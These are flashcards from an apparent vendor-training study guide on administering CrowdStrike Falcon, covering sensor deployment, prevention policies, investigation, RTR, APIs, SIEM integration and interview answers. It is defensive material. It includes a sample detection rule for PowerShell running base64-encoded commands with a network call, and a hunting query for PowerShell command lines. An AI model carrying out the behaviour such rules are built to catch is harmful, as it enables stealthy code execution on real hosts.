CrowdStrike Falcon Pocket Book

CrowdStrike Falcon Pocket Book — Uplatz

50 deep-dive flashcards • Wide layout • Fewer scrolls • 20+ Interview Q&A • Readable code examples

Section 1 — Fundamentals

1) What is CrowdStrike Falcon?

A cloud-native EDR/EPP platform delivering prevention, detection, response, threat intel, identity protection, and vulnerability insight via a lightweight sensor and cloud analytics.

# Components: Sensor (endpoint) + Cloud (Falcon) + Modules

2) Core Modules

Prevention (NGAV), EDR, Real Time Response (RTR), Threat Intelligence, Spotlight (vuln), Identity Protection, Cloud Security, Device Control, Firewall Mgmt, Sandbox.

# License bundles vary by org; enable per policy

3) How Falcon Works

Sensor observes telemetry (process, file, net, registry), applies ML/IOAs locally, streams to cloud for analytics, correlates with intel, and raises detections mapped to MITRE ATT&CK.

Telemetry → Analytics → Detections → Response

4) EPP vs EDR

EPP blocks known/unknown threats pre-execution; EDR gives deep visibility, detections, and investigation/response tooling. Use both for layered defense.

Prevent (NGAV) + Detect (EDR) + Respond (RTR)

5) Key Terms

IOA (behavioral patterns), IOC (indicators), Detection, Incident, Policy, Containment, Host Group, Falcon Query.

Host → Policy → Sensor → Detections/Incidents

6) Deployment Models

SaaS console; sensors on Windows/macOS/Linux/Servers. Optional cloud and identity sensors for workloads and identity telemetry.

# Always validate OS support matrix before rollout

7) Data & Privacy

Telemetry is security-focused; configure data retention, region, and PII handling per policy. Use RBAC and audit logs.

# Governance: tag assets, restrict roles, review exports

8) Detections 101

Severity + Tactic/Technique (MITRE) + evidence. Response actions: contain host, kill process, quarantine file, RTR, ticketing/webhook.

Status: New → In Progress → Closed

9) Policies & Host Groups

Policies define prevention/EDR settings; precedence by platform and assignment to host groups (tags, OU, etc.). Use rings (pilot → broad).

Groups: "Pilot", "Prod-Servers", "HQ-Workstations"

10) Q&A — “Why Falcon vs legacy AV?”

Answer: Behavior-based IOAs, strong cloud analytics, instant telemetry, lightweight agent, integrated IR tooling, and ATT&CK mapping for faster investigations.

Section 2 — Sensors, Policies, Prevention & Detections

11) Sensor Install (Windows)

Deploy via EDR tools/SCCM/Intune. Include customer ID (CID) and verify connectivity. (Use official docs for exact switches.)

# PowerShell (simplified example)
Start-Process "WindowsSensor.exe" -ArgumentList "/install /quiet CID=XXXXXXXXXXXX-XX"

12) Sensor Install (macOS)

Use MDM with PPPC/kext/system extensions approved; grant Full Disk Access as required by policy.

# Jamf/MDM payloads for approvals + .pkg deployment

13) Sensor Install (Linux)

Packages vary (rpm/deb). Ensure kernel compatibility; allow outbound to Falcon cloud domains.

sudo dpkg -i falcon-sensor.deb
sudo /opt/CrowdStrike/falconctl -s --cid=XXXXXXXXXXXX-XX

14) Verify Sensor Health

Confirm host appears in console, sensor version current, telemetry flowing, and prevention on. Monitor health dashboards.

# CLI (Linux)
sudo /opt/CrowdStrike/falconctl -g --aid

15) Policy Rings

Start with “Detect” in a pilot group, observe, then graduate to “Prevent” where stable. Document exceptions, change control, and rollback.

Rings: Canary → EarlyAdopter → Broad

16) Prevention Tuning

Enable ML, script control, exploit mitigation, and ransomware protection per risk appetite. Use detection-only mode briefly during baselining.

# Keep logs; escalate blocklists gradually

17) Exclusions (Best Practice)

Narrow scope to signed, known paths. Avoid wildcards and user-writable dirs. Review regularly with audit evidence.

Include hash/publisher; avoid global */Temp/*

18) Containment & Quarantine

Contain isolates host network except to Falcon; quarantine prevents file execution. Release requires approval workflow.

Actions: ContainHost, LiftContainment, Quarantine, Restore

19) Detection Lifecycle

Triage → scope impact → validate evidence → respond (kill/contain) → eradicate (patch, creds) → recover → lessons. Link to incident tickets.

Owner, SLA, Notes, Linked Jira/SNOW

20) Q&A — “False Positives?”

Answer: Triage patterns, check hash reputation, verify behavior, and adjust policy or targeted exclusions. Never blanket exclude user-writable paths.

Section 3 — Investigation, RTR, Threat Hunting & Intel

21) Investigation View

Process tree, timeline, IOA triggers, file/network artifacts, users, registry, and command lines. Pivot on parent/child relationships.

Pivot: Process → Hash → Other Hosts

22) Falcon Query Language (FQL)

Search events and detections with filters (hostname, user, hash, cmdline, tactic). Save queries for reuse and dashboards.

event_simpleName:"ProcessRollup2" AND CommandLine:*powershell*

23) Real Time Response (RTR) Basics

Secure remote shell to an endpoint (role-gated). Common uses: collect triage artifacts, query processes, remove artifacts. Actions are audited.

# Examples (read/collect oriented)
ls, cat, get, ps, netstat

24) Containment During RTR

Contain before invasive actions; maintain chain of custody. Export artifacts to a case folder with hashes.

# Hash every collected file for integrity

25) Spotlight (Vulnerability)

Visibility into CVEs across hosts; prioritize by exploitability and exposure. Create remediation tickets and track closure.

Filters: CVSS, Vendor, App, Host Group

26) Identity Protection

Detects credential misuse, MFA fatigue, lateral movement paths, weak protocols. Integrate with IdP and DCs for signals.

Alerts: Kerberoasting, Pass-the-Hash, RDP anomalies

27) Threat Intelligence

Actor profiles, indicators, TTPs, and reports. Map detections to active actor tradecraft for prioritization.

IOC feeds → match against environment

28) Custom IOA & Detections

Define behavioral rules for your environment (e.g., restricted script interpreters). Test in detect-only, then enforce.

Rule: powershell.exe with base64 + network call

29) Watchlists & Dashboards

Track sensitive assets, privileged accounts, and crown jewels. Build dashboards for exec and SOC metrics.

KPIs: MTTD, MTTR, contain time, repeat offenders

30) Q&A — “Hunt vs Respond?”

Answer: Hunting is proactive—look for faint signals/TTPs; response is reactive—contain, eradicate, recover. Both feed each other via lessons learned.

Section 4 — Integrations, APIs, SIEM, Cloud & Automation

31) API Access

Create API client (Client ID/Secret) with least-privilege scopes. Use OAuth2 to obtain bearer tokens; rotate regularly.

# OAuth token (pseudo)
POST /oauth2/token { client_id, client_secret }

32) Sample API Call

Query detections/incidents and pipe to SIEM or data lake. Handle pagination and rate limits with backoff.

curl -H "Authorization: Bearer <TOKEN>" \
"https://api.crowdstrike.com/detections/queries/detections/v1"

33) Webhooks

Push new detections/incidents to SOAR or chat for instant triage. Verify signatures; queue processing for reliability.

POST /webhooks/falcon → enqueue → ack

34) SIEM Integrations

Splunk, Sentinel, QRadar, Elastic: pull or push detections, events, and audit logs. Normalize fields; map ATT&CK/TTP tags.

Parse → Enrich (host, user) → Index

35) SOAR Playbooks

Auto-contain critical-severity hosts, open tickets, notify owners, and request approval for quarantine. Maintain human-in-the-loop.

If severity ≥ High → Contain + Notify + Ticket

36) Cloud Security

Monitor cloud workloads/containers; detect runtime threats and misconfigurations. Feed findings back to engineering for hardening.

K8s signals + cloud logs → detections

37) Identity & Zero Trust

Correlate endpoint and identity signals; enforce step-up auth or isolate risky sessions. Reduce lateral movement paths.

Risk score → Conditional access policy

38) Data Lake Export

Stream telemetry/detections to storage (e.g., S3/ADLS) for long-term analytics. Partition by date/host for efficient queries.

path: /year=2025/month=08/day=26/

39) Reporting & KPIs

Exec summaries with trends, top TTPs, patch SLAs, mean time to contain, investigation backlog, false-positive rate.

Board: "Risk posture" + "IR velocity"

40) Q&A — “API Security?”

Answer: Least-privilege scopes, rotate secrets, IP-allowlist, signed webhooks, per-route quotas, and audit logs. Never embed keys in client apps.

Section 5 — Operations, Governance, Tuning & Interview Q&A

41) RBAC & Multi-Tenant

Separate roles for SOC Tier1/2, IR, admins, and auditors. Use host groups and sites/business units for scoping.

Principle: Least privilege + separation of duties

42) IR Runbooks

Document steps for malware, phishing, insider, and ransomware events: detect → contain → eradicate → recover → postmortem.

Include comms templates + legal/reg shells

43) Patch & Vulnerability Flow

Spotlight → prioritize exploitable CVEs → ticket → deploy → verify. Track SLA by asset criticality and exposure.

SLA: Critical servers < 7 days

44) Performance & Stability

Keep sensors updated, monitor CPU/RAM impact, and test with app owners. Maintain an exemption review board.

Ring updates + A/B testing in pilot groups

45) Business Continuity

Plan for console unavailability or network isolation: local prevention remains; document offline procedures and escalation.

Runbooks: offline triage + later sync

46) Compliance Mapping

Map controls to ISO/NIST/PCI: malware protection, logging, incident response, vulnerability management, access control.

Evidence: policies, detections, tickets, reports

47) Tuning Cadence

Weekly: review new detections, false positives, and new software baselines. Monthly: rules refresh, dashboards, exclusions audit.

CAB approves high-impact policy changes

48) Production Checklist

Sensor coverage ≥ 98% endpoints
Policy rings + rollback plan
SIEM/SOAR integration live
IR runbooks tested quarterly
Backlog < SLA, KPIs trending down
Access reviews + audit logs

49) Common Pitfalls

Overbroad exclusions, stale sensors, no pilot ring, ignoring identity signals, lack of ticket linkage, and weak API protection.

Fix: governance + automation + metrics

50) Interview Q&A — 20 Practical Questions (Expanded)

1) Falcon value prop? Behavior-driven prevention + rich telemetry + fast IR.

2) IOA vs IOC? IOA = behavior/pattern; IOC = specific artifact (hash, IP, domain).

3) Policy rings? Pilot in detect, measure, then enforce prevent in phases.

4) Reduce false positives? Targeted exclusions, validate reputation, and monitor drift.

5) MITRE mapping? Detections carry tactic/technique for triage and reporting.

6) What’s RTR? Secure remote shell for triage/response with audit controls.

7) When to contain? Lateral movement risk or active C2; prioritize critical assets.

8) Spotlight prioritization? Exploitability, external exposure, business criticality.

9) Identity signals? Detect credential abuse, abnormal authentications, path risks.

10) SIEM integration? Centralize detections/telemetry, correlation, and retention.

11) Webhooks vs polling? Webhooks for near-real-time, polling for backfills.

12) API security? Rotate secrets, scope tokens, store in vault, IP allowlist.

13) Telemetry privacy? Limit PII, RBAC, logging, and data export governance.

14) Endpoint performance? Keep sensors current; test with heavy apps; monitor.

15) Custom IOA use? Enforce org-specific controls (e.g., block unsigned scripts).

16) KPI examples? MTTD/MTTR, contain time, patch SLA, repeat detections.

17) Ransomware response? Contain, snapshot/backup check, isolate shares, IR playbook.

18) Cloud workload? Enable runtime visibility; integrate with cloud logs.

19) Change management? CAB review, staged rollout, rollback tested.

20) Pitfall to avoid? Blanket exclusions and skipping post-incident lessons learned.

Cutting-edge Technology Courses by Uplatz